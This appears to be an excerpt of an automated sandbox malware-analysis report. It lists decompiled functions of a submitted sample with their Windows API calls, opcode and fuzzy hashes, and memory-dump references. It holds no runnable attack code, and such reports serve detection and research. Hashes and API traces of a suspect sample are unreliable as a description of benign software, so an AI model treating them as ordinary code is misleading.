                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: 2bd641e61fd41cad027bf8f296f1e3b691fcc9d27b265c091fb56763822e523d
                  • Instruction ID: f097a66c8970109f3baab4e68e52ac5a8537ffa175177f56886f83bda83e1383
                  • Opcode Fuzzy Hash: 2bd641e61fd41cad027bf8f296f1e3b691fcc9d27b265c091fb56763822e523d
                  • Instruction Fuzzy Hash: 37F0E231A4521CBBCF016F60DC06CAE7F61FF49721B004264FD196A260DAB28E20FB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: de0320ca95822ab134ef06ff5e4cf4539eaedab5af738aa1fe3548fd98e315d2
                  • Instruction ID: b30db30b0b6fb71fddf97e50809a1c89cad76914420ca38880699d986bf4d1e7
                  • Opcode Fuzzy Hash: de0320ca95822ab134ef06ff5e4cf4539eaedab5af738aa1fe3548fd98e315d2
                  • Instruction Fuzzy Hash: 05E05531B4522C6B8310AB60CC02DAEBB50DF16B22F000214FD0967240EDB18E10B6D7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00F532AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: 7ec41b3a69fc869b81753af009ee654d073f30a114c1fd28c23b5ed3c0aad14f
                  • Instruction ID: 3b9f463fc800e66a9598ccb3b72bb36bd0f800f97c03328ea1ac87f8dd7baa09
                  • Opcode Fuzzy Hash: 7ec41b3a69fc869b81753af009ee654d073f30a114c1fd28c23b5ed3c0aad14f
                  • Instruction Fuzzy Hash: F5D05B21F81A387A951032D5AC039AE7E448701FF6F450252FF0D7E18295A6C550B1E6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4E20B
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3So
                  • API String ID: 1269201914-1105799393
                  • Opcode ID: 6bec2fdcee0dce95a23e7650804d2964399c228ffd6fc6cfe96e4fcff84e0808
                  • Instruction ID: 3d66aeadfae290822d5ffd7cf19e39955d7c4466b55aad689babf619f3092a1d
                  • Opcode Fuzzy Hash: 6bec2fdcee0dce95a23e7650804d2964399c228ffd6fc6cfe96e4fcff84e0808
                  • Instruction Fuzzy Hash: E4B0129266E0017C370C11007D16D37171CC4C0B60330801BBA05D408299818D4D7033
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F5AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F5B1A5,?), ref: 00F5AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F5B1EA,?,00000000), ref: 00F5B3C4
                  • GetCPInfo.KERNEL32(00000000,00F5B1EA,?,?,?,00F5B1EA,?,00000000), ref: 00F5B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 5fc32f5a07db5d49bf43193ac93ae33d9c6b186348928262d056ed00ecfa3725
                  • Instruction ID: 0b6cefdc476a64851072ab8e64a06c5d420e9cf7ec2c9b10c7fd0136af8a2040
                  • Opcode Fuzzy Hash: 5fc32f5a07db5d49bf43193ac93ae33d9c6b186348928262d056ed00ecfa3725
                  • Instruction Fuzzy Hash: 98514771D002059FDB34CF31C8816BABBE5EF41321F18416EDA968B253D739954AFB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F31385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F36057: __EH_prolog.LIBCMT ref: 00F3605C
                    • Part of subcall function 00F3C827: __EH_prolog.LIBCMT ref: 00F3C82C
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C86F
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C893
                  • new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 60b96f1498cc64618d10e639eb852c3a2efa9a91cb6d09401711a6c325aab5f9
                  • Instruction ID: 5d315757358141704136fe202b917ea9bd14c4435228697a11efcce2cd015690
                  • Opcode Fuzzy Hash: 60b96f1498cc64618d10e639eb852c3a2efa9a91cb6d09401711a6c325aab5f9
                  • Instruction Fuzzy Hash: A44156B0805B409EE724DF7988859E7FBE5FF18310F404A2ED6EE83282CB766554CB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F31380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F36057: __EH_prolog.LIBCMT ref: 00F3605C
                    • Part of subcall function 00F3C827: __EH_prolog.LIBCMT ref: 00F3C82C
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C86F
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C893
                  • new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: ce879f9702771ce0b89d83bb12c41be17013efc64463724c4d59e7a429f31e1f
                  • Instruction ID: c10f6a719dc6a30c47b2ff4708f34500a7760d15480b24f38126f2b109f6b1b0
                  • Opcode Fuzzy Hash: ce879f9702771ce0b89d83bb12c41be17013efc64463724c4d59e7a429f31e1f
                  • Instruction Fuzzy Hash: 2A4146B0805B409EE724DF7988859E7FBE5FF19310F444A2ED6EE83282CB762554DB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F58FA5: GetLastError.KERNEL32(?,00F70EE8,00F53E14,00F70EE8,?,?,00F53713,00000050,?,00F70EE8,00000200), ref: 00F58FA9
                    • Part of subcall function 00F58FA5: _free.LIBCMT ref: 00F58FDC
                    • Part of subcall function 00F58FA5: SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F5901D
                    • Part of subcall function 00F58FA5: _abort.LIBCMT ref: 00F59023
                    • Part of subcall function 00F5B2AE: _abort.LIBCMT ref: 00F5B2E0
                    • Part of subcall function 00F5B2AE: _free.LIBCMT ref: 00F5B314
                    • Part of subcall function 00F5AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F5B1A5,?), ref: 00F5AF46
                  • _free.LIBCMT ref: 00F5B200
                  • _free.LIBCMT ref: 00F5B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: f31b875b0a97d4f96f4beda3a5fef353f8ce3096b230bdd6a3bc9de4af9e214f
                  • Instruction ID: d112f715a8c583a9bf16c6a1cc00a0790a990eaa6cc96b781ac48d5f48d9de10
                  • Opcode Fuzzy Hash: f31b875b0a97d4f96f4beda3a5fef353f8ce3096b230bdd6a3bc9de4af9e214f
                  • Instruction Fuzzy Hash: 35310A32D04208AFDB11EF69C841B6D77F1EF40372F254099EE149B291EB755D4AEB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F39EDC,?,?,00F37867), ref: 00F397A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F39EDC,?,?,00F37867), ref: 00F397DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 9bbe57b6e3085d76978255604f6ba3bd25a560ba1391f4729e2fff1c6f4eaf09
                  • Instruction ID: a531d61b0cfa577f68744c411e762b1c53fa4815cd85515c1cf51d725c7008a8
                  • Opcode Fuzzy Hash: 9bbe57b6e3085d76978255604f6ba3bd25a560ba1391f4729e2fff1c6f4eaf09
                  • Instruction Fuzzy Hash: EA21E671514748AEE7308F24CC85BA7BBE8EB49774F00491DF5E5821D1C3F4AC49AA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                  Download Yara Rule
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F37547,?,?,?,?), ref: 00F39D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F39E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: 7bacc32d9baf7f79977749a617e1a119bfeee05c5fad746bf6b5a86a118b35a7
                  • Instruction ID: 16bdf8c01b7c0ac99494419bbb58edcf63bfa4444f27a615c19fef062bd2b1b2
                  • Opcode Fuzzy Hash: 7bacc32d9baf7f79977749a617e1a119bfeee05c5fad746bf6b5a86a118b35a7
                  • Instruction Fuzzy Hash: AE21E73154C246ABC714DF24C852EABBBE4AF95728F04081CF8D1C7141D7A9DE0CEBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetProcAddress.KERNEL32(00000000,00F63958), ref: 00F5A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F5A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: da264060501e8117c306a04e65fcd63df824fdcc3e0b5a3931ead5e7f17a7605
                  • Instruction ID: 76f3de0cf176b37affe67c9f4d59e26d684aa19277336e02e371eb4ebd12adfd
                  • Opcode Fuzzy Hash: da264060501e8117c306a04e65fcd63df824fdcc3e0b5a3931ead5e7f17a7605
                  • Instruction Fuzzy Hash: 09113A37E101255B9F21DEA8EC4496A7391AB813317164320FF25EB274EA70DC15F6D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00F39B35,?,?,00000000,?,?,00F38D9C,?), ref: 00F39BC0
                  • GetLastError.KERNEL32 ref: 00F39BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 0836b4a07b5a6156ac5eb30ea2ee5741b74508214941a53b6f9f9c64b48808c5
                  • Instruction ID: d45a3b518d776e3dc05bd5241843c43c3eeabe4c252a0c7b826af434b31ff0d9
                  • Opcode Fuzzy Hash: 0836b4a07b5a6156ac5eb30ea2ee5741b74508214941a53b6f9f9c64b48808c5
                  • Instruction Fuzzy Hash: 2401C43270C219DB8B08CF65AC9497EF399AFC5731F14452DF92687290CAF1DE05BA21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00F39E76
                  • GetLastError.KERNEL32 ref: 00F39E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: bf9ea49f9b64aa810accb5b97144d36f1e67c08acc66795fce8ea5503de2da1f
                  • Instruction ID: 279d4a1fd55913d65a031c13d81035447c93b2fdd5daddffef68b4400d838537
                  • Opcode Fuzzy Hash: bf9ea49f9b64aa810accb5b97144d36f1e67c08acc66795fce8ea5503de2da1f
                  • Instruction Fuzzy Hash: F00192727082046BEB34DE69DC4476BB7D99B84334F14893EF156C2680DAF5DC88A620
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F58606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00F58627
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F70F50,00F3CE57,?,?,?,?,?,?), ref: 00F58663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Heap$AllocAllocate_free
                  • String ID:
                  • API String ID: 2447670028-0
                  • Opcode ID: 2c344b767d6ab3d488e56b6d151d5936174a7270d4796055a71df7acfd915a68
                  • Instruction ID: 132678f4ae05bef7859ffa7dc80169af8c1d258571beed193143fc96939ed4b2
                  • Opcode Fuzzy Hash: 2c344b767d6ab3d488e56b6d151d5936174a7270d4796055a71df7acfd915a68
                  • Instruction Fuzzy Hash: 22F06232A0151666DB212A25AC01B6F3B689F92BF3F244116FF64B71A1DF34CC0B75A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F579B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F5B610: GetEnvironmentStringsW.KERNEL32 ref: 00F5B619
                    • Part of subcall function 00F5B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5B63C
                    • Part of subcall function 00F5B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5B662
                    • Part of subcall function 00F5B610: _free.LIBCMT ref: 00F5B675
                    • Part of subcall function 00F5B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5B684
                  • _free.LIBCMT ref: 00F579FD
                  • _free.LIBCMT ref: 00F57A04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                  • String ID:
                  • API String ID: 400815659-0
                  • Opcode ID: 7182bde087eea26267c8b29cb5edfc5695149199f127ffc0513ce17e7d06f05f
                  • Instruction ID: 2ef1c8ba3350d8dec3be9bca4c6e58b93e4c3100e914813dabb4fdad28e1c401
                  • Opcode Fuzzy Hash: 7182bde087eea26267c8b29cb5edfc5695149199f127ffc0513ce17e7d06f05f
                  • Instruction Fuzzy Hash: 79E0E55390D64301EB62B33A3C0665F26049B82333B101766FF11DB0C2CE28890F30A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00F40915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F4091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: 58e7f89d594da40632a5dbac5a82844e6d26cd18450de25811bf6c83ce388060
